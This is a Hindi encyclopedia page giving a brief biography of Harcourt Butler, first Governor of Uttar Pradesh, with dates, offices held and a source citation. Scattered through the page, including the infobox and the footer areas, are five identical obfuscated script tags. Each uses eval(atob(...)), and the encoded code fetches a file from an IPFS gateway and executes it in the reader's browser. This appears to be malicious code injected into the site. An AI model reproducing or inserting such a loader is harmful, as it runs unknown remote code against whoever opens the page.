हरकोर्ट बटलर  

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
हरकोर्ट बटलर
पूरा नाम सर स्पेन्सर हरकोर्ट बटलर
जन्म 1 अगस्त, 1869
मृत्यु 2 मार्च, 1938
प्रसिद्धि उत्तर प्रदेश के पहले राज्यपाल
पद राज्यपाल (उत्तर प्रदेश, बर्मा)
संबंधित लेख राष्ट्रपति, उपराष्ट्रपति, राज्यपाल
अन्य जानकारी हरकोर्ट बटलर उत्तर प्रदेश के प्रथम राज्यपाल थे। वे 1921 में उत्तर प्रदेश के राज्यपाल बने और इस पद पर 1922 तक रहे।
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

हरकोर्ट बटलर (अंग्रेज़ी: Harcourt Butler, जन्म- 1 अगस्त, 1869; मृत्यु- 2 मार्च, 1938) उत्तर प्रदेश के प्रथम राज्यपाल थे। उनका पूरा नाम 'सर स्पेन्सर हरकोर्ट बटलर' था। वे 1921 में उत्तर प्रदेश के राज्यपाल बने और इस पद पर 1922 तक रहे।[१]

  • सर हरकोर्ट बटलर का जन्म 1 अगस्त, 1869 को हुआ था। हैरो तथा बालियोल कॉलेज से शिक्षा प्राप्त करने के बाद उनका विवाह 1894 में फ्लोरेंस से हुआ।
  • 1890 में वे आई.सी.एस. के लिए चयनित हुए थे।
  • भारत में सर बटलर ने सहायक कलक्टर तथा मजिस्ट्रेट, राजस्व परिषद के संयुक्त सचिव, बंदोबस्त अधिकारी, भुखमरी आयोग के सचिव, उत्तर प्रदेश शासन के वित्त सचिव एवं न्याय सचिव, लखनऊ के उपायुक्त, भारत सरकार के विदेश सचिव, गवर्नर-जनरल की कार्यकारिणी सभा के सदस्य के रूप में कार्य किया।
  • हरकोर्ट बटलर 1915-1917 के मध्य बर्मा के उप-राज्यपाल रहे।
  • 1918 में उन्हें उत्तर प्रदेश के आगरा एवं अवध का उप-राज्यपाल नियुक्त किया गया।
  • 1921 में वे उत्तर प्रदेश के राज्यपाल बने और इस पद पर 1922 तक रहे।
  • 1923-1927 के मध्य वे बर्मा के राज्यपाल रहे।
  • हरकोर्ट बटलर 1928 में भारतीय राज्य समिति के अध्यक्ष नामित किये गये।
  • वे नेशनल प्राविंशियल बैंक पी. एण्ड ओ. कम्पनी के निदेषक भी रहे।
  • हरकोर्ट बटलर का निधन 2 मार्च, 1938 ई. को हुआ।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. सर हरकोर्ट (स्पेंसर) बटलर (हिंदी) upgovernor.gov.in। अभिगमन तिथि: 01 अक्टूबर, 2016।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>



<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

"https://amp.bharatdiscovery.org/w/index.php?title=हरकोर्ट_बटलर&oldid=572842" से लिया गया